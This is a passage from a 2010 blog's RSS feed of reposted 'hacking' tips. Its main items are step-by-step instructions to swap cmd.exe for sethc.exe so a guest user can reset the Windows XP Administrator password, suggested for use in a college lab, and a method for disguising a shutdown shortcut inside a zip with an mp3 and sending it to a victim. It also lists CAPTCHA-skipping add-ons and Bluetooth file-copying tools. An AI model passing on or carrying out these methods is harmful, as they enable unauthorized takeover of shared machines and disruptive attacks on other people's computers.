&lt;a href="http://www.mabsoft.com/nettools.htm" target="_blank"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;Source&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyJoLkydabo2Yfuohet8j0uNzO4LrVpLV8-A7uyAkLDr1yLI6qWEghIdWXewekvlCfzUWnk25QnfCmkIEHb90st3xAZ9Z3fmSBzTB7BeFibYsOh60U6SA_KjsjYg4PlTb44cC5ipJB14I/s72-c/nettools.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Hack Windows XP Administrator Password</title><link>http://0dl.blogspot.com/2010/11/hack-windows-xp-administrator-password.html</link><category>HaCkINg</category><author>noreply@blogger.com (Zero Cost Download)</author><pubDate>Sun, 21 Nov 2010 13:12:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-2531239924006445464</guid><description>&lt;span class="Apple-style-span" style="font-family: Verdana, Geneva, sans-serif; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 17px;"&gt;This is one of the best method to&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b style="font-family: Verdana, Geneva, sans-serif; font-size: 13px; font-weight: bold; line-height: 17px;"&gt;Hack Windows XP Administrator Password.&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, Geneva, sans-serif; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 17px;"&gt;For&amp;nbsp;&lt;/span&gt;&lt;/span&gt;hacking&lt;span class="Apple-style-span" style="font-family: Verdana, Geneva, sans-serif; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 17px;"&gt;&amp;nbsp;admin you must have log in as guest or limited account.This methodod hacking sdmin is very easy.You don’t need any software or live cd.All hacking is done manual.To hack XP admin password follow these steps.Please backup your files which we are going to use here.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: Verdana, Geneva, sans-serif; font-size: 13px; line-height: 17px; margin-bottom: 1.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;b style="font-weight: bold;"&gt;Method&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: Verdana, Geneva, sans-serif; font-size: 13px; line-height: 17px; margin-bottom: 1.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;1.Go to&amp;nbsp;&lt;b style="font-weight: bold;"&gt;C:/windows/system32&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: Verdana, Geneva, sans-serif; font-size: 13px; line-height: 17px; margin-bottom: 1.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;2.Copy cmd.exe and paste it on desktop&lt;/div&gt;&lt;div style="font-family: Verdana, Geneva, sans-serif; font-size: 13px; line-height: 17px; margin-bottom: 1.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;3.Rename&amp;nbsp;&lt;b style="font-weight: bold;"&gt;cmd.exe&amp;nbsp;&lt;/b&gt;to&amp;nbsp;&lt;b style="font-weight: bold;"&gt;sethc.exe&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: Verdana, Geneva, sans-serif; font-size: 13px; line-height: 17px; margin-bottom: 1.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;4.Copy the new&amp;nbsp;&lt;b style="font-weight: bold;"&gt;sethc.exe to system 32&lt;/b&gt;,when windows asks for overwriting the file,then click yes&lt;/div&gt;&lt;div style="font-family: Verdana, Geneva, sans-serif; font-size: 13px; line-height: 17px; margin-bottom: 1.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;5.Now press&amp;nbsp;&lt;b style="font-weight: bold;"&gt;shift key 5 times&lt;/b&gt;&amp;nbsp;you will get cmd prompt close that&lt;/div&gt;&lt;div style="font-family: Verdana, Geneva, sans-serif; font-size: 13px; line-height: 17px; margin-bottom: 1.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;6.Now Log out from your guest account and at the login screen,press&lt;b style="font-weight: bold;"&gt;&amp;nbsp;shift key 5 times.&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: Verdana, Geneva, sans-serif; font-size: 13px; line-height: 17px; margin-bottom: 1.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;7.You will get commmand prompt there&lt;br /&gt;
Now type “&amp;nbsp;&lt;b style="font-weight: bold;"&gt;NET USER ADMINISTRATOR&lt;/b&gt;&amp;nbsp;mypassword” where “mypassword” can be any password and Administrator is name of admin account ,then press enter.&lt;/div&gt;&lt;div style="font-family: Verdana, Geneva, sans-serif; font-size: 13px; line-height: 17px; margin-bottom: 1.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;8.You will see “ The Command completed successfully” and then exit the command prompt.&lt;/div&gt;&lt;div style="font-family: Verdana, Geneva, sans-serif; font-size: 13px; line-height: 17px; margin-bottom: 1.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Thats done…You have hacked administrator password&lt;/div&gt;&lt;div style="font-family: Verdana, Geneva, sans-serif; font-size: 13px; line-height: 17px; margin-bottom: 1.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;If you have any problem comment here.Please&amp;nbsp;&lt;b style="font-weight: bold;"&gt;backup your cmd.exe and sethc.exe&lt;/b&gt;if you are trying this on your own computer.This works because of&lt;b style="font-weight: bold;"&gt;&amp;nbsp;sethc.exe process Vulnerability in Windows XP&lt;/b&gt;.You can search google for more information about it.&lt;br /&gt;
This method of hacking XP admin password can be used in your college lab where you have&amp;nbsp;&lt;b style="font-weight: bold;"&gt;limited or guest access&amp;nbsp;&lt;/b&gt;to computers.&lt;/div&gt;&lt;a href="http://www.hackingtrick.com/2010/05/hack-windows-xp-administrator-password.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;a href="http://www.hackingtrick.com/2010/05/hack-windows-xp-administrator-password.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;Source&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to Skip Bypass CAPTCHA Verification</title><link>http://0dl.blogspot.com/2010/11/how-to-skip-bypass-captcha-verification.html</link><category>HaCkINg</category><author>noreply@blogger.com (Zero Cost Download)</author><pubDate>Sun, 21 Nov 2010 13:08:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-2420595496556074564</guid><description>If you don’t know what Captcha is ,It is an acronym for “Completely Automated Public Turing test to tell Computers and Humans Apart”. Entering Captcha is very  annoying  for everyone.It used to safe from bots and spammers.You can Bypass captcha in many waysThere are various firefox Plugins which can be used for bypass procees.Check this out&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1.SkipScreen&lt;/b&gt;&lt;br /&gt;
skips unnecessary pages on sites like Rapidshare, Megaupload, zShare, Mediafire, and more. Try it out, or watch a demo at skipscreen.com.SkipScreen will be tenaciously maintained and improving all the time. Why click through ad-laden pages and wait for countdowns when your computer can do it for you?&lt;br /&gt;
&lt;br /&gt;
Supported sites:&lt;br /&gt;
Rapidshare.com&lt;br /&gt;
zShare.net&lt;br /&gt;
MediaFire.com&lt;br /&gt;
Megaupload.com&lt;br /&gt;
Sharebee.com&lt;br /&gt;
Depositfiles.com&lt;br /&gt;
Sendspace.com&lt;br /&gt;
Divshare.com&lt;br /&gt;
Linkbucks.com&lt;br /&gt;
Uploaded.to&lt;br /&gt;
Hotfiles.com&lt;br /&gt;
4shared.com&lt;br /&gt;
many more…&lt;br /&gt;
&lt;br /&gt;
Download it from here&lt;br /&gt;
&lt;b&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/11243/" target="_blank"&gt;https://addons.mozilla.org/en-US/firefox/addon/11243/&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.hackingtrick.com/2010/05/how-to-skip-bypass-captcha-verification.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;Source&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>How to Control Move Mouse Pointer with Keyboard?</title><link>http://0dl.blogspot.com/2010/11/how-to-control-move-mouse-pointer-with.html</link><category>HaCkINg</category><author>noreply@blogger.com (Zero Cost Download)</author><pubDate>Sun, 21 Nov 2010 12:56:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-6116326227586207482</guid><description>&lt;b&gt;How to Control move Mouse Pointer from Keyboard&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.tricksmachine.com/wp-content/uploads/2009/07/mousekeys1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://www.tricksmachine.com/wp-content/uploads/2009/07/mousekeys1.jpg" /&gt;&lt;/a&gt;You can try this method if you are bore of using your mouse in normal way.You can control your mouse pointer with keyboard keys in all windows . When your mouse stops working, you can enable this keyboard feature to complete your important work. This keyboard mouse can perform all tasks which are same as of normal mouse.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Follow the given steps to activate the keyboard mouse:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
1.  log into your computer with administrative rights.&lt;br /&gt;
&lt;br /&gt;
2. To activate this feature, press left Alt+left Shift+NumLock keys at once and you will receive a small MouseKey box.&lt;br /&gt;
&lt;br /&gt;
3. To keep MouseKeys on, click on Ok button or click on cancel button to cancel MouseKeys box.&lt;br /&gt;
&lt;br /&gt;
4. Click on Settings button, if you want to adjust the mouse cursor detail settings.&lt;br /&gt;
&lt;br /&gt;
5. A new dialog box will appear with “Settings for MouseKeys”, now you can do all mouse settings ,for example mouse cursor speed, acceleration and some other features.&lt;br /&gt;
&lt;br /&gt;
6. Now using Numeric keypad, you can move your mouse pointer where you want to move on desktop&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;The controls are:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
1,2,3,4,6,7,8 and 9 keys are used to move the mouse cursor into different directions on  desktop&lt;br /&gt;
Key 5 is used as mouse click button.&lt;br /&gt;
Insert key used to hold down mouse button.&lt;br /&gt;
+ Sign used to double click on any object.&lt;br /&gt;
Delete button used to release the mouse.&lt;br /&gt;
&lt;br /&gt;
You can disable this feature by Click on NumLock button&lt;br /&gt;
Enjoy this feature&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.hackingtrick.com/2010/05/how-to-control-move-mouse-pointer-with-keyboard.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;Source&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Command Prompt Tricks Tips &amp; Hacks</title><link>http://0dl.blogspot.com/2010/11/command-prompt-tricks-tips-hacks.html</link><category>HaCkINg</category><author>noreply@blogger.com (Zero Cost Download)</author><pubDate>Sun, 21 Nov 2010 12:44:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-5774997543078786741</guid><description>There are lot of command prompt tricks and tips which many of us don’t know about.Command prompt can be very useful if you know how to use.Just go to cmd and check the following cool commands&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1. systeminfo&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
With this command, you can retrieve the following information:&lt;br /&gt;
&lt;br /&gt;
Host Name &lt;br /&gt;
OS Name &lt;br /&gt;
OS Version &lt;br /&gt;
OS Manufacturer &lt;br /&gt;
OS Configuration &lt;br /&gt;
OS Build Type &lt;br /&gt;
Registered Owner etc&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2. driverquery&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Get Installed Driver Information&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3. ipconfig /all&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
information about your network connection and IP address &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;4. subst W: C:windows&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Map A Drive Letter to a Folder&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;5. tasklist &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
List All Tasks Running On The Computer&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;6.taskkill /im programnames.exe /f&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
to Kill A Program&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.hackingtrick.com/2010/04/command-prompt-tricks-tips-hacks.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;Source&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Bluetooth Hacking Software</title><link>http://0dl.blogspot.com/2010/11/bluetooth-hacking-software.html</link><category>HaCkINg</category><author>noreply@blogger.com (Zero Cost Download)</author><pubDate>Sun, 21 Nov 2010 12:39:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-9066119298931002877</guid><description>Bluetooth Hacking software &amp;amp; tools for your mobile phones.Here is list of some bluetooth hacking softwares.Here is some free  bluetooth hacking software that would let you do a lot more fun with your mobile phones&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1.MagicBlueHac&lt;/b&gt;k: you can download this software from here&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.getjar.com/mobile/15782/magicbluehack/" target="_blank"&gt;http://www.getjar.com/mobile/15782/magicbluehack/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2.BT File Manager&lt;/b&gt; : Application to browsing and copy files from other phones connected via Bluetooth.&lt;br /&gt;
&lt;br /&gt;
Download this from here&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.getjar.com/mobile/18378/bt-file-manager/" target="_blank"&gt;http://www.getjar.com/mobile/18378/bt-file-manager/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3.Mobilewitch Bluetooth Remote&lt;/b&gt; Control :Mobilewitch Bluetooth Remote Control is a free of charge program that can be used to control your computer from distance. The main purpose of this software is to turn your mobile phone into a universal PC remote control.&lt;br /&gt;
&lt;br /&gt;
download this software from here..&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.getjar.com/mobile/26591/mobilewitch-bluetooth-remote-control/" target="_blank"&gt;http://www.getjar.com/mobile/26591/mobilewitch-bluetooth-remote-control/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Use these bluetooth hacking software and tools  on your own responsibility.Read manual of these software to operate them&lt;br /&gt;
Enjoy&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.hackingtrick.com/2010/03/bluetooth-hacking-software-tools.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;Source&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Google Search Tricks Google Dorks</title><link>http://0dl.blogspot.com/2010/11/google-search-tricks-google-dorks.html</link><category>HaCkINg</category><author>noreply@blogger.com (Zero Cost Download)</author><pubDate>Sun, 21 Nov 2010 12:31:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-5209360038310478911</guid><description>Google search can be very useful if you know how to use them.Here are some google dorks which can be useful while searching on google.Check them and enjoy google search.There are lot of google dorks i have only only given some useful ones..&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;b&gt;site:domain.com&lt;/b&gt; “search term = restricts search results to the given domain.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;allinurl:WORDS&lt;/b&gt; = shows only pages with all search terms in the url.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;inurl:WORD &lt;/b&gt;= like allinurl: but filters the URL based on the first term only.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;allintitle:WORD &lt;/b&gt;= shows only results with terms in title&lt;/li&gt;
&lt;li&gt;&lt;b&gt;intitle:WORD &lt;/b&gt;= similar to allintitle, but only for the next word.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;cache:URL &lt;/b&gt;= will show the Google cached version of the URL.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;info:URL &lt;/b&gt;= will show a page containing links to related searches, backlinks, and pages&lt;/li&gt;
&lt;li&gt;&lt;b&gt;link:URL &lt;/b&gt;= lists other pages that link to the URL.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;related:URL &lt;/b&gt;= lists other pages that are related to the URL.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;filetype:FILETYPE &lt;/b&gt;= will restrict searches to that filetype&lt;/li&gt;
&lt;li&gt;-&lt;b&gt;filetype:FILETYPE &lt;/b&gt;= will remove that file type from the search.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;site:www.anysite.net “+www.anysite.net”&lt;/b&gt; = shows you how many pages of your site are indexed by google&lt;/li&gt;
&lt;li&gt;&lt;b&gt;allintext&lt;/b&gt;: = searches only within text of pages, but not in the links or page title&lt;/li&gt;
&lt;li&gt;&lt;b&gt;allinlinks&lt;/b&gt;: = searches only within links, not text or title&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;a href="http://www.hackingtrick.com/2010/02/google-search-tricks-google-dorks.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;Source&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to Shutdown Someones Computer</title><link>http://0dl.blogspot.com/2010/11/how-to-shutdown-someones-computer.html</link><category>HaCkINg</category><author>noreply@blogger.com (Zero Cost Download)</author><pubDate>Sun, 21 Nov 2010 12:25:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-4554498042042316880</guid><description>&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;Shutdown someones computer using messenger remotely??&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
This is a very simple trick by which you can shutdown someone or your friend computer.Follow these simple steps to shutdown someones computer&lt;br /&gt;
&lt;br /&gt;
1. Right click on desktop, and then go New, then Shortcut.&lt;br /&gt;
&lt;br /&gt;
2. Then in the “type location of the item” type or copy this and paste at the location:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;b&gt;%windir%system32shutdown.exe -s -t 120 -c “This is a virus”&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;This is just a simple command to shutdown computer..&lt;br /&gt;
&lt;br /&gt;
3.Click  to create your shortcut.&lt;br /&gt;
&lt;br /&gt;
4.Done&lt;br /&gt;
&lt;br /&gt;
Your shutdown shortcut is now created.You can change 120 to whatever you like ,it is a number of seconds to shutdown a computer.You can also modified “this is a virus” with your own message.Now you have to send this to your friend or your enemy.&lt;br /&gt;
&lt;br /&gt;
Go through this tutorial&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://0dl.blogspot.com/2010/11/how-to-make-file-undetectable.html"&gt;http://0dl.blogspot.com/2010/11/how-to-make-file-undetectable.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Now you know what to do .Just use shortcut you created and and other file like mp3 .Bind those file in a zip so that whenever someone extract zip the shortcut file you created get executed on its own without double clicking it.Send this to your friend someone else to shutdown his computer.You can send this zip file to your friend using messenger or email.&lt;br /&gt;
&lt;br /&gt;
You can double click on that shortcut to check how it will look to your friend&lt;br /&gt;
To abort shutdown your computer go to run and type shutdown -a.   Now shutdown of your computer will be aborted.&lt;br /&gt;
&lt;br /&gt;
Try it and and play prank on your friend your enemy or someone else whom you want to shutdown computer.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.hackingtrick.com/2010/01/how-to-shutdown-someones-computer.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;Source&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item></channel></rss>